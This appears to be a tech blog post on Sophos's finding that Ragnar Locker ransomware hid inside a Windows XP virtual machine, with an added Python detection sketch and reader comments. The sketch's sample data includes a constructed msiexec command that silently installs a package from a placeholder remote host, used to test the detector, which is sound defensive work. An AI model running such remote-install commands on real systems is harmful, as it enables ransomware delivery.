Hiding Malware, With Windows XP

In the nearly four decades since the first PC viruses spread in the wild, malware writers have evolved some exceptionally clever ways to hide their creations from system administrators and from anti-virus writers. The researchers at Sophos have found one that conceals itself as probably the ultimate Trojan horse: it hides its tiny payload in a Windows XP installation.

The crusty Windows version is packaged up with a copy of an older version of the VirtualBox hypervisor on which to run it. A Windows exploit allows Microsoft Installer to download the whole thing as a 122 MB installer package that hides the hypervisor and a 282 MB disk image containing Windows XP. The Ragnar Locker ransomware payload is a tiny 49 kB component of the XP image; the infected host runs the guest on the hypervisor unchallenged, so the payload executes inside the virtual machine rather than as a process the host's defences would ordinarily inspect.

The Sophos analysis has a fascinating delve into some of the Windows batch file tricks it uses to probe its environment and set up the connections between host and XP. It leaves us amazed both at the unorthodox use of a complete Microsoft OS and at the realisation that we have seemingly reached a point of system bloat at which such a large unauthorised download, and the running of a complete Microsoft operating system in a hypervisor (albeit one from twenty years ago), can go unnoticed. Still, unlike some malware stories we’ve seen, at least this one is real.
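The loader chain described above (Microsoft Installer fetching a large package from a URL, a VirtualBox hypervisor unpacked somewhere it normally would not live, a guest booted with the payload inside it) is something a defender can look for in process-creation telemetry without knowing any of the sample's specific file names. The following is an added illustration, not code from Hackaday or from the Sophos write-up: it runs two simple rules over constructed process events and correlates them through the parent-process chain. The event layout, the example paths and command lines, the documentation-range IP address and the assumption that a legitimate VirtualBox install lives under Program Files are all assumptions made for the example.

```python
"""
Detection sketch (added example, not from the post or from Sophos): flag
msiexec.exe installing a package straight from a URL, VirtualBox binaries
running from an unusual directory, and any VirtualBox process that descends
from such an msiexec. All event data below is constructed for illustration.
"""
import re
from dataclasses import dataclass

# Real VirtualBox executable names; any of them is enough to boot a guest.
VBOX_IMAGES = {"vboxheadless.exe", "vboxmanage.exe", "virtualbox.exe", "vboxsvc.exe"}
# Assumption: a properly installed VirtualBox lives under the default install path.
NORMAL_VBOX_DIR = re.compile(r"^[a-z]:\\program files\\oracle\\virtualbox\\", re.I)
URL_ARG = re.compile(r"https?://\S+", re.I)
MAX_HOPS = 8  # bound on how far up the parent chain we walk


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the newly created process
    cmdline: str


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def has_ancestor(event, by_pid, suspect_pids) -> bool:
    """Walk the (bounded) parent chain looking for a flagged pid."""
    cur, hops = event, 0
    while cur.ppid in by_pid and hops < MAX_HOPS:
        cur = by_pid[cur.ppid]
        if cur.pid in suspect_pids:
            return True
        hops += 1
    return False


def analyze(events):
    by_pid = {e.pid: e for e in events}
    findings = []
    # Pass 1: msiexec pulling its package from a URL instead of a local file.
    remote_msi = {}
    for e in events:
        if image_name(e.image) == "msiexec.exe":
            m = URL_ARG.search(e.cmdline)
            if m:
                remote_msi[e.pid] = m.group(0)
                findings.append(Finding("remote-msi", e.pid, m.group(0)))
    # Pass 2: hypervisor binaries in odd places, and any hypervisor descended
    # from a remote-package msiexec (the correlation that matters most here).
    for e in events:
        if image_name(e.image) not in VBOX_IMAGES:
            continue
        if not NORMAL_VBOX_DIR.match(e.image):
            findings.append(Finding("vbox-unusual-path", e.pid, e.image))
        if has_ancestor(e, by_pid, remote_msi):
            findings.append(Finding("vbox-from-remote-msi", e.pid, e.cmdline))
    return findings


# Constructed sample events (not real telemetry); 203.0.113.0/24 is a
# documentation address range, and every path and file name is made up.
SAMPLE_EVENTS = [
    ProcEvent(100, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i http://203.0.113.5/package.msi /q"),
    ProcEvent(300, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c install.bat"),
    ProcEvent(400, 300, r"C:\Users\Public\va\VBoxHeadless.exe",
              "VBoxHeadless.exe --startvm micro"),
    # Benign: an administrator listing VMs from a normally installed VirtualBox.
    ProcEvent(500, 100, r"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe",
              "VBoxManage.exe list vms"),
]


def rules_hit(events=SAMPLE_EVENTS):
    """Distinct (rule, pid) pairs raised over the events, in sorted order."""
    return sorted({(f.rule, f.pid) for f in analyze(events)})


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.rule:22} pid={f.pid} {f.detail}")
```

Run on the sample, the benign VBoxManage call from the default install directory raises nothing, while the headless VM started from a public directory is flagged twice: once for its location and once because its parent chain leads back to an msiexec that fetched its package from the network. Each rule alone produces noise on real hosts (administrators do install from URLs, and portable VirtualBox exists); the ancestry correlation is what makes the combination worth an alert.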

18 thoughts on “Hiding Malware, With Windows XP”

    1. Mostly works normally. I am frequently using nested virtualization of ESXi in VMware Workstation for either POCs or replicating clients’ infrastructure segments. Some networking limitations are present, but not critical.

  1. Well, it works. Rather slow without enabling nested virtualization (making CPU hardware VM features available to the guest)… but performance is not really that important to ransomware.

    1. Only these days; back when XP was around, Windows was actually quite good. I have many fond memories of using XP. Today I’m a Windows refugee who has fled to Linux (Mint/Ubuntu) to escape the tyranny of (Windows) Ten and its obsession with forcible updates to break your system when you can least afford them, and generally remote management and dependence on cloud infrastructure.

      1. This. Windows update has broken so many device drivers and software packages that I have started to make disk images when things seem to be working too well on my gaming machine. On the other hand, I have never had apt upgrade break anything other than my own hacky scripts.

      2. Yeah, I enjoyed XP as well. For me it was fast, stable, and still had good compatibility for some special older programs that I still use. It probably won’t get much love here thanks to some hippies stealing Unix changed the world for most folks here, but I really thought XP was pretty decent. Some of the later slim releases will run on remarkably limited machines. I went to the penguin for a while until it got bloated and went to Win7, which was also pretty darn good. Then 10 came out. I had mixed feelings at first, but with a little tweaking I have it doing like I want and am enjoying the Linux kernel and shell updates. I honestly feel like if folks put a tenth of the effort into taming some unwanted features of 10 that they do into getting Linux to do some things, they wouldn’t mind it so much, but to each their own. I don’t hate Linux at all but feel like it has encountered a lot of the gripes people had about Windows as it has grown up, plus the 8000 distros out there, which is just utter confusion for better or worse. I was glad to see your comment because it is a rarity on HaD, and I think it is funny to see MS and Apple grow in opposite directions imho. I think the only thing I will respectfully disagree with is the dependency of the cloud thing, as they alllllllll do that these days. Either way, happy computing and deving :)

  2. I remember the first malware that could survive switching to Windows XP Safe Mode. Normally Safe Mode would block malware from running and would leave the malware program files exposed to be findable and deletable.

    Then someone figured out how to make their malware make randomly renamed backup copies (and other tricks to hide it) when Windows was shut down. That process also cleared out the obvious stuff it put in the Registry so the malware was nowhere to be found in Safe Mode. Could even run a deep scan of every file and it wouldn’t be found.

    The trick to stop it was literally pulling the plug. While running in normal mode, yank the power cord out or turn off the switch on the power supply. Then boot directly to Safe Mode. Booting normally would allow the malware to stay because it could recover from that.

    So with the latest malware file names reported by your favorite anti software, you could delete all the files in Safe Mode then reboot to normal mode, then your anti software would be able to clean the Registry.

    Of course the malware a-holes eventually figured out how to have their software protect itself against cutting the power, by hacking Windows deep enough they could have the malware running and self-protecting in Safe Mode. Only ways to kill that were by pulling the plug (because shutting down normally would allow the malware to hide itself) then booting with a live CD with removal software, or by wiping the hard drive and doing a clean install.

    1. >wiping the hard drive and doing a clean install

      The best way to keep Windows XP fast and clean.

      I had an nLite CD with integrated drivers. Then it was a matter of installing Gothic II and the latest versions of Opera and Foobar2000, and the PC was ready again in no time.
